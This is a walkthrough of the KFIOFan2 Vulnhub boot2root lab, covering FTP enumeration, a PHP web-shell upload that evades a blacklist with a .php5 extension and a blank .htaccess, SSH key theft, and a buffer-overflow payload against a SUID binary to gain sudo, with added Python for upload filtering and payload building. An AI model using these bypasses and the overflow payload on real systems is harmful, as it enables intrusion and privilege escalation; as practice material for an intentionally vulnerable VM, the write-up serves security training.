CTF KFIOFan: 2 Vulnhub Walkthrough

Today we are going to take on a new challenge, KFIOFan2. Credit for making this VM goes to “Khaos Farbauti Ibn Oblivion”. It is a boot2root challenge: we have to get root on the server to complete it. You can download the VM here

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Enumerating ftp services

Exploitation

  • Uploading php shell to get ssh key

Privilege Escalation

  • Buffer Overflow to get sudo rights

Walkthrough:

Scanning:

First thing first, scan the vulnerable machine using nmap.

nmap -p- -A 192.168.1.33

Here we found that the only open port is 26921, which is running FTP.

Let’s take a look at what the FTP service has to offer. The FTP banner gave us a message:

“Salut Alice ! Suite a l’attaque sur notre precedent serveur, j’en prepare un nouveau qui sera bien plus securise ! C’est en travaux pour l’instant donc s’il te plait ne touche a rien pour l’instant… Bob”

Which translates to

“Hi Alice! After the attack on our previous server, I’m preparing a new one that will be much more secure! It’s under construction for now, so please don’t touch anything for now… Bob”

Anonymous login was allowed. After logging in, we found 4 images and a directory named `serrure` (French for “lock”). We downloaded the images and checked the directory, but it was empty.

With nothing but 4 images to go on, we looked for a hidden hint, starting with steganographic content. That gave nothing, so we tried another approach: we stitched the four images together, and the catch turned out to be very simple. In the centre of the combined image was a filename, “cle.txt” (clé is French for “key”).

We searched for this file but did not find it anywhere. So we tried something a little different: we created a file named cle.txt with dummy content and uploaded it to the target over FTP.

After putting the file in the serrure directory, we scanned the target again. The cle.txt file worked as a key: a new port, 26980, was now open and running an HTTP service.

nmap -p- -A 192.168.1.33

Now that we had found another port, we tried to enumerate the website, but the welcome message looked like this:

Tout ce qui est, est père du mensonge et fils du néant

Which translates to

All that is, is father of lies and son of nothingness

While analysing the page source, we found two comments:

<!-- Test présence fichier cle.txt : OK -->

<!-- Test contenu fichier cle.txt : Erreur -->

Which translate to

<!-- Test presence of file cle.txt : OK -->

<!-- Test content of file cle.txt : Error -->

So the file is found, but its content is wrong and needs to be changed.

Alongside this we enumerated the target further and found a directory named uploads, but it was empty.

To put the correct content in cle.txt, we looked for the meaning of the hint. After some research we found an article written by the author of this lab, in which the quote turns out to be a description of the author’s nickname, i.e. Khaos Farbauti Ibn Oblivion.

We used this name as the content of cle.txt and replaced the file in the serrure directory over FTP:

echo "Khaos Farbauti Ibn Oblivion" > cle.txt
ftp 192.168.1.33 26921
cd serrure
delete cle.txt
put cle.txt

Now let’s check the webpage again. This time a file upload form was in place: the content of cle.txt evidently switches the behaviour of the page. All we need to do now is upload a shell. First we tried a .txt file, and it was uploaded without trouble.

Next we tried uploading a PHP shell, but it was blocked.

To bypass the filter we uploaded the shell with a .php5 extension instead, which succeeded.

To verify that the shell was stored, we checked the uploads directory and found our file there.

We then tried to execute the shell, but it failed. After some attempts we suspected that a .htaccess file in the uploads directory was preventing PHP from executing there. To override it we had to overwrite that file, so we created a blank .htaccess and uploaded it.

The .htaccess upload succeeded, and after that the uploaded shell ran system commands for us.
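The two bypasses above (an extension the filter does not list, and a dotfile that rewrites the directory’s execution rules) both come from filtering by blacklist. The following is an added example, not code from the KFIOFan2 VM (the walkthrough never shows its upload script): it models a weak extension blacklist next to an allowlist that also discards the client-chosen filename. The extension sets, the stem rule and the storage naming are assumptions; the sample filenames are the walkthrough’s three attempts plus two constructed ones.

```python
"""Upload filter: extension blacklist (bypassable) versus allowlist (hardened).

Added example, not the VM's own code. The filter rules below are assumptions
chosen to reproduce the .php5 and .htaccess bypasses from the walkthrough.
"""
import os
import re
import secrets
from typing import Dict, Optional, Tuple

# Weak filter (assumed): block a few extensions, accept everything else.
BLACKLIST = {"php", "phtml"}


def blacklist_allows(filename: str) -> bool:
    """True if the weak filter accepts `filename`.

    ".php5" is not in the set, and ".htaccess" has no extension at all
    as far as os.path.splitext is concerned, so both slip through."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ext not in BLACKLIST


# Hardened filter (assumed): allowlist of data extensions, strict stem,
# exactly one dot so dotfiles and "a.php.txt" style names are rejected.
ALLOWLIST = {"txt", "png", "jpg", "jpeg", "gif"}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowlist_allows(filename: str) -> bool:
    """True only for <stem>.<ext> with a permitted ext and a plain stem."""
    parts = filename.split(".")
    if len(parts) != 2:          # ".htaccess" -> ["", "htaccess"], "a.php.txt" -> 3 parts
        return False
    stem, ext = parts
    return bool(STEM_RE.match(stem)) and ext.lower() in ALLOWLIST


def stored_name(filename: str) -> Optional[str]:
    """Server-chosen name for an accepted upload, or None if rejected.

    The client-supplied stem is thrown away entirely, so the stored name
    can never become a dotfile or carry a second extension."""
    if not allowlist_allows(filename):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads: the walkthrough's attempts plus two more.
SAMPLES = ["note.txt", "shell.php", "shell.php5", ".htaccess", "shell.php.txt"]


def compare(samples=SAMPLES) -> Dict[str, Tuple[bool, bool]]:
    """Map each sample name to (blacklist verdict, allowlist verdict)."""
    return {s: (blacklist_allows(s), allowlist_allows(s)) for s in samples}


if __name__ == "__main__":
    for name, (weak, strong) in compare().items():
        print(f"{name:16} blacklist={'ACCEPT' if weak else 'reject':6} "
              f"allowlist={'ACCEPT' if strong else 'reject'}")
```

The filename check is only half of it: on the Apache side the uploads directory should be served with `AllowOverride None`, so an uploaded .htaccess is never read, and with PHP disabled there via `php_admin_flag engine off` in the vhost, which a per-directory file cannot switch back on.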

After some searching on the box, we found an SSH private key.

Now all we need is an SSH port to connect to. We ran nmap again and this time found SSH on port 26922.

nmap -p- -A 192.168.1.33

Now we have an SSH port and an SSH key; let’s combine them and get a shell. We saved the key to a file named id_rsa, gave it 0600 permissions, and used it to connect as bob. Once connected, we looked for files with the SUID bit set and found one named test.

chmod 0600 id_rsa
ssh bob@192.168.1.33 -p 26922 -i id_rsa
find / -perm -u=s -type f 2>/dev/null

When we ran the file it asked for a password, which we did not have. We ran strings on the binary and found some interesting things.

strings test

First, the binary imports the system function, meaning a system command is executed somewhere.

Second, there is a command string “touch /root/authorize_bob”, which is presumably the command we want executed.

Third, there is a string “aliceestnulle” right below the password prompt “Mot de passe” (“Password”).

We ran the file again with this password and got a message.

As entering the correct password gave us nothing useful, we examined the binary in gdb.

gdb test
set disassembly-flavor intel
disassemble main
start

We started the program with the start command, and when it asked for a password we tested for a buffer overflow by feeding it a 50-byte input generated with pattern_create.rb from the Metasploit framework.

cd /usr/share/metasploit-framework/tools/exploit
./pattern_create.rb -l 50

After supplying the pattern, we found that past a certain length our input overwrites the saved return address on the stack, so we control where the program returns to.

Before trying the various ways of exploiting the overflow, we went back to our earlier findings to check for other hints. Fortunately, right above the touch command in the strings output there was a string:

lancement debug

which translates to

launch debug

Disassembling the debug function showed that the call to system is made inside it.

disassemble debug

Next, we are left with getting the debug function executed. We took the input length at which the overflow reached the saved return address and replaced the bytes that land there with the address of the debug function, as read from the gdb disassembly. One caveat a practitioner should check: an address of the form 0x5555555548xx is the gdb default for a position-independent binary with ASLR off, which gdb disables for the process it debugs; it matches the live process only if ASLR is also disabled on the target, i.e. randomize_va_space is 0.

python -c 'print ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6"+"\x20\x48\x55\x55\x55\x55")' | ./test
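The walkthrough jumps from “we fed it a pattern” to a 21-byte pad without showing how that offset was read off the crash. The block below is an added example, not code from the walkthrough: it reimplements the scheme of Metasploit’s pattern_create.rb and pattern_offset.rb, turns the bytes gdb shows at the stack pointer into an offset, and packs the target address. The crash bytes “Aa7Aa8Aa” are a constructed value chosen to be consistent with the walkthrough’s 21-byte padding; the debug() address 0x555555554820 is the one the walkthrough read from gdb. It also explains why the page’s one-liner gets away with sending only six address bytes.

```python
"""Cyclic pattern, offset lookup and return-address payload for the `test` binary.

Added example, not code from the original walkthrough. Reimplements the
Metasploit pattern_create / pattern_offset scheme so the offset-finding step
can be reproduced without the framework, then builds the overwrite payload.
The crash bytes in the demo are constructed; the debug() address is the one
the walkthrough took from gdb.
"""
import struct
import sys
from typing import Optional, Union

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def full_pattern() -> bytes:
    """All 20280 unique bytes: Aa0Aa1...Aa9Ab0Ab1...Zz9 (after that it would repeat)."""
    return "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS).encode()


def pattern_create(length: int) -> bytes:
    """Same output as `pattern_create.rb -l <length>`."""
    pat = full_pattern()
    if not 0 < length <= len(pat):
        raise ValueError(f"length must be 1..{len(pat)}")
    return pat[:length]


def pattern_offset(value: Union[bytes, int]) -> int:
    """Offset of `value` inside the pattern (what pattern_offset.rb prints).

    `value` is either the bytes gdb shows at $rsp after the crash (x86-64
    will not load a non-canonical pattern chunk into rip, so the program
    stops on `ret` with rsp pointing into our input), or a register value
    as an int (the 32-bit EIP case), decoded little-endian."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little").rstrip(b"\x00")
    idx = full_pattern().find(value)
    if idx < 0:
        raise ValueError("value not found in pattern")
    return idx


def build_payload(offset: int, target: int, addr_len: int = 8) -> bytes:
    """Padding up to the saved return address, then `target` little-endian.

    addr_len=8 is the general x86-64 form. addr_len=6 reproduces the
    walkthrough's one-liner: it omits the two high bytes, which only works
    because the saved address being overwritten already has 0x0000 there
    (every canonical user-space address does) and the read stops at the
    newline, leaving those two bytes untouched."""
    if not 0 < addr_len <= 8:
        raise ValueError("addr_len must be 1..8")
    return b"A" * offset + struct.pack("<Q", target)[:addr_len]


def aslr_status() -> Optional[int]:
    """Value of /proc/sys/kernel/randomize_va_space on the target, or None
    off Linux. 0 means the address seen in gdb is also the live address;
    1 or 2 means a PIE binary is relocated on every run."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as fh:
            return int(fh.read().strip())
    except OSError:
        return None


# Constructed demo: assume gdb showed these 8 bytes at $rsp after feeding
# pattern_create(50) to the password prompt.
CRASH_BYTES_AT_RSP = b"Aa7Aa8Aa"
DEBUG_ADDR = 0x555555554820   # debug() as disassembled in gdb (ASLR off)


def walkthrough_payload() -> bytes:
    """The exact bytes the walkthrough's python one-liner emits (minus newline)."""
    return build_payload(pattern_offset(CRASH_BYTES_AT_RSP), DEBUG_ADDR, addr_len=6)


if __name__ == "__main__":
    # Diagnostics go to stderr so stdout can be piped straight into ./test
    print("offset:", pattern_offset(CRASH_BYTES_AT_RSP), file=sys.stderr)
    print("randomize_va_space:", aslr_status(), file=sys.stderr)
    sys.stdout.buffer.write(walkthrough_payload() + b"\n")
```

Run it as `python3 payload.py | ./test` on the target: the offset goes to stderr, the payload to stdout. If `randomize_va_space` is not 0 on a PIE binary, the gdb address is wrong for the live process and no amount of re-running the same bytes will land on debug().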

After running the same payload a few times, we logged out of the SSH session, reconnected, and tried sudo. It worked.

ssh bob@192.168.1.33 -p 26922 -i id_rsa
sudo su

Let’s capture the flag and finish the CTF.

cd /root
cat flag.txt

Author: Deepanshu is a Certified Ethical Hacker, Security Researcher, Pentester and Trainer at Ignite Technologies.